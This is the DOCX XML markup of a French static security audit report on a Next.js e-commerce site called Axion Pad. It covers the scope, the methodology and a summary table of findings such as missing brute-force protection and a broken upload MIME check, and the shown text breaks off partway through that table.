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1614"/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>RAPPORT D'AUDIT DE SÉCURITÉ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="444444"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Application Web Axion Pad</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4419"/>
        <w:gridCol w:w="4419"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="444444"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Projet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Axion Pad — Site e-commerce (Next.js 15 / Cloudflare Pages)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="444444"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>03/05/2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="444444"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Périmètre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Code source complet — branche main</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="444444"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Classificatio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CONFIDENTIEL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1614"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>1. Résumé exécutif</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Un audit de sécurité statique a été réalisé sur l'intégralité du code source du site e-commerce Axion Pad, développé avec Next.js 15 (App Router) et déployé sur Cloudflare Pages avec une base de données D1. L'audit a été conduit le 03/05/2026 sur la branche main du dépôt GitHub.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>L'architecture globale démontre un niveau de maturité sécuritaire satisfaisant : les requêtes SQL utilisent des paramètres liés (pas d'injection SQL détectée), les mots de passe utilisateurs sont hachés avec PBKDF2-SHA256 (100 000 itérations), la signature Stripe webhook est correctement vérifiée, et les cookies de session sont marqués HttpOnly + Secure + SameSite=Strict. Le risque global est modéré.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Cependant, 11 vulnérabilités ont été identifiées dont une de criticité Haute, quatre de criticité Moyenne et quatre de criticité Faible. Les points les plus urgents à corriger sont :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>L'absence totale de protection anti-brute-force sur le login admin (H-01)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Un bug logique qui désactive la validation MIME des fichiers uploadés (M-01)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Le mot de passe admin stocké en clair dans les variables d'environnement (M-02)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>L'absence de tous les en-têtes de sécurité HTTP standards (M-04)</w:t>
      </w:r>
    </w:p>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shd w:val="clear" w:color="auto" w:fill="C03028"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Critique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D97508"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Haute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
            <w:shd w:val="clear" w:color="auto" w:fill="B48700"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Moyenne</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1D5FA8"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
            <w:shd w:val="clear" w:color="auto" w:fill="444444"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Informationnelle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1614"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>2. Périmètre et méthodologie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1614"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>2.1 Périmètre</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Routes API : /api/admin/login, /api/admin/orders/[id], /api/auth/login, /api/auth/register, /api/checkout, /api/webhook, /api/upload, /api/track, /api/reviews</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Bibliothèques d'authentification : src/lib/admin-auth.ts, src/lib/user-auth.ts, src/lib/uploadToken.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Configuration : next.config.ts, wrangler.toml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Schéma de base de données : migrations/0001–0004.sql</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Composants React côté client (XSS, données sensibles exposées)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Dépendances NPM (package.json — analyse de versions connues vulnérables)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1614"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>2.2 Méthodologie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>L'audit a été conduit exclusivement par analyse statique du code source (SAST). La méthode appliquée suit le référentiel OWASP Testing Guide v4 et couvre :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Analyse des flux d'entrée/sortie : validation, sanitisation, encodage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Vérification des contrôles d'accès et de l'authentification (OWASP A01, A02, A07)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Recherche d'injections : SQL, HTML/XSS, SSRF, path traversal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Revue de la cryptographie : algorithmes, gestion des clés, entropie des tokens</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Analyse des configurations HTTP : headers, CORS, cookies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Vérification des dépendances tierces connues vulnérables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Simulation de scénarios d'attaque pour chaque finding identifié</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1614"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>3. Tableau récapitulatif des vulnérabilités</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shd w:val="clear" w:color="auto" w:fill="1A1614"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1A1614"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Criticité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1A1614"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Titre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1A1614"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Fichier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1A1614"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF3E0"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="D97508"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>H-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF3E0"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="D97508"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Haute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Absence de protection anti-brute-force sur le login admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="444444"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>src/app/api/admin/login/route.ts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="444444"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>CWE-307</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFDD4"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="B48700"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>M-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFDD4"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="B48700"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Moyenne</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Bug logique : validation MIME toujours vraie dans l'upload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="444444"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>src/app/api/upload/route.ts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="444444"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>CWE-434</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFDD4"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="B48700"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>M-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFDD4"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="B48700"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Moyenne</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Mot de passe admin stocké en clair et comparé sans hachage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="444444"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>src/app/api/admin/login/route.ts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="444444"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>CWE-256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFDD4"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="B48700"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>M-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFDD4"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="B48700"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Moyenne</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Token d'upload sans expiration ni usage unique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="444444"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>src/lib/uploadToken.ts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="444444"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>CWE-613</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFDD4"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="B48700"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>M-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFDD4"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="B48700"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Moyenne</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Absence d'en-têtes de sécurité HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="444444"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>next.config.ts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="444444"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>CWE-693</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1D5FA8"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>F-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1D5FA8"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Énumération d'utilisateurs via la réponse d'inscription</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="444444"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>src/app/api/auth/register/route.ts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="444444"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>CWE-204</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1D5FA8"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>F-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
          </w:tcPr>
